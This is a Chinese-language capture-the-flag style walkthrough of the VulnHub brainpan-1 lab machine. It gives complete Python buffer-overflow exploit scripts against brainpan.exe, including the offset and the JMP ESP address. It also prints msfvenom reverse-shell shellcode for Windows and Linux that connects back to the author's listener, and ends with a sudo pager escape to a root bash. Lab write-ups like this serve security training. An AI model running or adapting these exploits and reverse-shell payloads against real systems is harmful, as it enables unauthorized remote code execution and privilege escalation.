vulnhub渗透日记10：brainpan-1

前言

⏰时间：2023.7.22
🗺️靶机地址：https://www.vulnhub.com/entry/brainpan-1,51/
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
🙏本人水平有限，如有错误望指正，感谢您的查阅！
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

9999端口运行brainpan

扫目录发现/bin
点击文件下载

缓冲区溢出

windows机器下载immunity debugger分析文件
用大量字符发送给文件测试溢出点
生成大量字符

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

#!/usr/bin/python
import sys
import socket as so

buff = '''Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'''

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print "Usage Example: python %s 192.168.58.156 8080" % sys.argv[0] 
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print "\n[+] Attempting to send buffer overflow to brainpan.exe..."
try:
    s.connect((server, port))
    s.send(buff + '\r\n')
    print "\n[+] Completed!"
except:
    print "[!] Unable to connect to brainpan.exe."

EIP被35724134覆盖
偏移量524

usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134 -l 1000

#!/usr/bin/python
import sys
import socket as so

buff = "A" * 524 + "B" * 4 + "C" * (1000-524-4) # "C"字符有没有都行，主要是看那四个B覆盖EIP

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print "Usage Example: python %s 192.168.58.156 8080" % sys.argv[0] 
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print "\n[+] Attempting to send buffer overflow to brainpan.exe..."
try:
    s.connect((server, port))
    s.send(buff + '\r\n')
    print "\n[+] Completed!"
except:
    print "[!] Unable to connect to brainpan.exe."

EIP成功被4个B覆盖，B的十六进制的ascii码是42
可以看到EBP是41414141，全是A
ESP是执行命令的部分，全是C
按照栈的设计，ESP寄存器应该位于EIP寄存器的后面（中间可能有一些空隙）
下面确定jmp esp的地址
查询到jmp esp字符在内存中的表示
!mona find -s “\xff\xe4” -m brainpan.exe


获得是JMP ESP地址：0x311712f3
生成反弹shell，-b去除坏字符

──(eric㉿Eric)-[/usr/share/metasploit-framework/tools/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LPORT=5555 LHOST=192.168.10.1 -e x86/shikata_ga_nai -b "\x00\x0a\x0b" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1745 bytes
buf =  b""
buf += b"\xdb\xd8\xd9\x74\x24\xf4\x5a\x33\xc9\xbf\xbe\xbf"
buf += b"\x25\xb9\xb1\x52\x83\xea\xfc\x31\x7a\x13\x03\xc4"
buf += b"\xac\xc7\x4c\xc4\x3b\x85\xaf\x34\xbc\xea\x26\xd1"
buf += b"\x8d\x2a\x5c\x92\xbe\x9a\x16\xf6\x32\x50\x7a\xe2"
buf += b"\xc1\x14\x53\x05\x61\x92\x85\x28\x72\x8f\xf6\x2b"
buf += b"\xf0\xd2\x2a\x8b\xc9\x1c\x3f\xca\x0e\x40\xb2\x9e"
buf += b"\xc7\x0e\x61\x0e\x63\x5a\xba\xa5\x3f\x4a\xba\x5a"
buf += b"\xf7\x6d\xeb\xcd\x83\x37\x2b\xec\x40\x4c\x62\xf6"
buf += b"\x85\x69\x3c\x8d\x7e\x05\xbf\x47\x4f\xe6\x6c\xa6"
buf += b"\x7f\x15\x6c\xef\xb8\xc6\x1b\x19\xbb\x7b\x1c\xde"
buf += b"\xc1\xa7\xa9\xc4\x62\x23\x09\x20\x92\xe0\xcc\xa3"
buf += b"\x98\x4d\x9a\xeb\xbc\x50\x4f\x80\xb9\xd9\x6e\x46"
buf += b"\x48\x99\x54\x42\x10\x79\xf4\xd3\xfc\x2c\x09\x03"
buf += b"\x5f\x90\xaf\x48\x72\xc5\xdd\x13\x1b\x2a\xec\xab"
buf += b"\xdb\x24\x67\xd8\xe9\xeb\xd3\x76\x42\x63\xfa\x81"
buf += b"\xa5\x5e\xba\x1d\x58\x61\xbb\x34\x9f\x35\xeb\x2e"
buf += b"\x36\x36\x60\xae\xb7\xe3\x27\xfe\x17\x5c\x88\xae"
buf += b"\xd7\x0c\x60\xa4\xd7\x73\x90\xc7\x3d\x1c\x3b\x32"
buf += b"\xd6\xe3\x14\x36\x27\x8c\x66\x46\x32\xff\xee\xa0"
buf += b"\x56\xef\xa6\x7b\xcf\x96\xe2\xf7\x6e\x56\x39\x72"
buf += b"\xb0\xdc\xce\x83\x7f\x15\xba\x97\xe8\xd5\xf1\xc5"
buf += b"\xbf\xea\x2f\x61\x23\x78\xb4\x71\x2a\x61\x63\x26"
buf += b"\x7b\x57\x7a\xa2\x91\xce\xd4\xd0\x6b\x96\x1f\x50"
buf += b"\xb0\x6b\xa1\x59\x35\xd7\x85\x49\x83\xd8\x81\x3d"
buf += b"\x5b\x8f\x5f\xeb\x1d\x79\x2e\x45\xf4\xd6\xf8\x01"
buf += b"\x81\x14\x3b\x57\x8e\x70\xcd\xb7\x3f\x2d\x88\xc8"
buf += b"\xf0\xb9\x1c\xb1\xec\x59\xe2\x68\xb5\x6a\xa9\x30"
buf += b"\x9c\xe2\x74\xa1\x9c\x6e\x87\x1c\xe2\x96\x04\x94"
buf += b"\x9b\x6c\x14\xdd\x9e\x29\x92\x0e\xd3\x22\x77\x30"
buf += b"\x40\x42\x52"

获取的地址存在一个问题。对于同样的一个地址，数据在网络传输和CPU存储时的表示方法是不同的，这里有一个大端和小端的概念。大端（Big-Endian）、小端（Little-Endian）以及网络字节序（Network Byte Order）的概念在编程中经常会遇到，其中网络字节序一般是指大端（对大部分网络传输协议而言）传输。大端、小端的概念是面向多字节数据类型的存储方式定义的，小端是低位在前（低位字节存储在内存低地址，字节高低顺序和内存高低地址顺序相同）；大端是高位在前（其中“前”是指靠近内存低地址，存储在硬盘上就是先写那个字节）。概念上字节序也叫主机序。

这里在使用Python编程向目标发送JMP ESP指令的地址时使用的是大端格式，而当前的地址311712f3是小端格式，如果要用"311712f3"来覆盖目标地址，要使用倒置的地址“\xf3\x12\x17\x31”，然后再放入之前脚本中替换那四个B的位置

构造思路：
1.用524个A用来覆盖掉正常的内存空间，
2.\xf3\x12\x17\x31是JMP ESP的地址用来指向shellcode；
3.EIP和ESP中间有一段空隙，需再加上一串空字符\x90,不能太大也不能太小，要正好把shellcode完整偏移进ESP
4.再加上msf生成的反弹shell

#!/usr/bin/python
import sys
import socket as so

buf =  b""
buf += b"\xbb\xfa\x94\x7e\xc6\xd9\xc1\xd9\x74\x24\xf4\x58"
buf += b"\x2b\xc9\xb1\x52\x31\x58\x12\x83\xc0\x04\x03\xa2"
buf += b"\x9a\x9c\x33\xae\x4b\xe2\xbc\x4e\x8c\x83\x35\xab"
buf += b"\xbd\x83\x22\xb8\xee\x33\x20\xec\x02\xbf\x64\x04"
buf += b"\x90\xcd\xa0\x2b\x11\x7b\x97\x02\xa2\xd0\xeb\x05"
buf += b"\x20\x2b\x38\xe5\x19\xe4\x4d\xe4\x5e\x19\xbf\xb4"
buf += b"\x37\x55\x12\x28\x33\x23\xaf\xc3\x0f\xa5\xb7\x30"
buf += b"\xc7\xc4\x96\xe7\x53\x9f\x38\x06\xb7\xab\x70\x10"
buf += b"\xd4\x96\xcb\xab\x2e\x6c\xca\x7d\x7f\x8d\x61\x40"
buf += b"\x4f\x7c\x7b\x85\x68\x9f\x0e\xff\x8a\x22\x09\xc4"
buf += b"\xf1\xf8\x9c\xde\x52\x8a\x07\x3a\x62\x5f\xd1\xc9"
buf += b"\x68\x14\x95\x95\x6c\xab\x7a\xae\x89\x20\x7d\x60"
buf += b"\x18\x72\x5a\xa4\x40\x20\xc3\xfd\x2c\x87\xfc\x1d"
buf += b"\x8f\x78\x59\x56\x22\x6c\xd0\x35\x2b\x41\xd9\xc5"
buf += b"\xab\xcd\x6a\xb6\x99\x52\xc1\x50\x92\x1b\xcf\xa7"
buf += b"\xd5\x31\xb7\x37\x28\xba\xc8\x1e\xef\xee\x98\x08"
buf += b"\xc6\x8e\x72\xc8\xe7\x5a\xd4\x98\x47\x35\x95\x48"
buf += b"\x28\xe5\x7d\x82\xa7\xda\x9e\xad\x6d\x73\x34\x54"
buf += b"\xe6\xbc\x61\x5c\xf7\x54\x70\x60\xe2\x17\xfd\x86"
buf += b"\x66\x48\xa8\x11\x1f\xf1\xf1\xe9\xbe\xfe\x2f\x94"
buf += b"\x81\x75\xdc\x69\x4f\x7e\xa9\x79\x38\x8e\xe4\x23"
buf += b"\xef\x91\xd2\x4b\x73\x03\xb9\x8b\xfa\x38\x16\xdc"
buf += b"\xab\x8f\x6f\x88\x41\xa9\xd9\xae\x9b\x2f\x21\x6a"
buf += b"\x40\x8c\xac\x73\x05\xa8\x8a\x63\xd3\x31\x97\xd7"
buf += b"\x8b\x67\x41\x81\x6d\xde\x23\x7b\x24\x8d\xed\xeb"
buf += b"\xb1\xfd\x2d\x6d\xbe\x2b\xd8\x91\x0f\x82\x9d\xae"
buf += b"\xa0\x42\x2a\xd7\xdc\xf2\xd5\x02\x65\x02\x9c\x0e"
buf += b"\xcc\x8b\x79\xdb\x4c\xd6\x79\x36\x92\xef\xf9\xb2"
buf += b"\x6b\x14\xe1\xb7\x6e\x50\xa5\x24\x03\xc9\x40\x4a"
buf += b"\xb0\xea\x40"

buff = "A" * 524 + "\xf3\x12\x17\x31" + "\x90" * 20 + buf

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print "Usage Example: python %s 192.168.58.156 8080" % sys.argv[0] 
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print "\n[+] Attempting to send buffer overflow to brainpan.exe..."
try:
    s.connect((server, port))
    s.send(buff + '\r\n')
    print "\n[+] Completed!"
except:
    print "[!] Unable to connect to brainpan.exe."

因为反弹的是windows的shell，进入的目标机的windows子环境
下面修改为反弹linux

┌──(eric㉿Eric)-[/usr/share/metasploit-framework/tools/exploit]
└─$ msfvenom -p linux/x86/shell_reverse_tcp LPORT=5555 LHOST=192.168.58.153 -e x86/shikata_ga_nai -b
 "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of py file: 479 bytes
buf =  b""
buf += b"\xda\xc2\xba\xaf\xae\xc7\x61\xd9\x74\x24\xf4\x5e"
buf += b"\x2b\xc9\xb1\x12\x83\xc6\x04\x31\x56\x13\x03\xf9"
buf += b"\xbd\x25\x94\x34\x19\x5e\xb4\x65\xde\xf2\x51\x8b"
buf += b"\x69\x15\x15\xed\xa4\x56\xc5\xa8\x86\x68\x27\xca"
buf += b"\xae\xef\x4e\xa2\xf0\xb8\x8b\xab\x99\xba\xeb\xde"
buf += b"\xea\x32\x0a\x50\x6a\x15\x9c\xc3\xc0\x96\x97\x02"
buf += b"\xeb\x19\xf5\xac\x9a\x36\x89\x44\x0b\x66\x42\xf6"
buf += b"\xa2\xf1\x7f\xa4\x67\x8b\x61\xf8\x83\x46\xe1"

#!/usr/bin/python
import sys
import socket as so

buf =  b""
buf += b"\xda\xc2\xba\xaf\xae\xc7\x61\xd9\x74\x24\xf4\x5e"
buf += b"\x2b\xc9\xb1\x12\x83\xc6\x04\x31\x56\x13\x03\xf9"
buf += b"\xbd\x25\x94\x34\x19\x5e\xb4\x65\xde\xf2\x51\x8b"
buf += b"\x69\x15\x15\xed\xa4\x56\xc5\xa8\x86\x68\x27\xca"
buf += b"\xae\xef\x4e\xa2\xf0\xb8\x8b\xab\x99\xba\xeb\xde"
buf += b"\xea\x32\x0a\x50\x6a\x15\x9c\xc3\xc0\x96\x97\x02"
buf += b"\xeb\x19\xf5\xac\x9a\x36\x89\x44\x0b\x66\x42\xf6"
buf += b"\xa2\xf1\x7f\xa4\x67\x8b\x61\xf8\x83\x46\xe1"

buff = "A" * 524 + "\xf3\x12\x17\x31" + "\x90" * 20 + buf


try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print "Usage Example: python %s 192.168.58.156 8080" % sys.argv[0] 
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print "\n[+] Attempting to send buffer overflow to brainpan.exe..."
try:
    s.connect((server, port))
    s.send(buff + '\r\n')
    print "\n[+] Completed!"
except:
    print "[!] Unable to connect to brainpan.exe."

python -c 'import pty;pty.spawn("/bin/bash")'

sudo提权

puck@brainpan:/home/puck$ sudo -l
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util #看到提示
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual cp
-  (press RETURN)!/bin/bash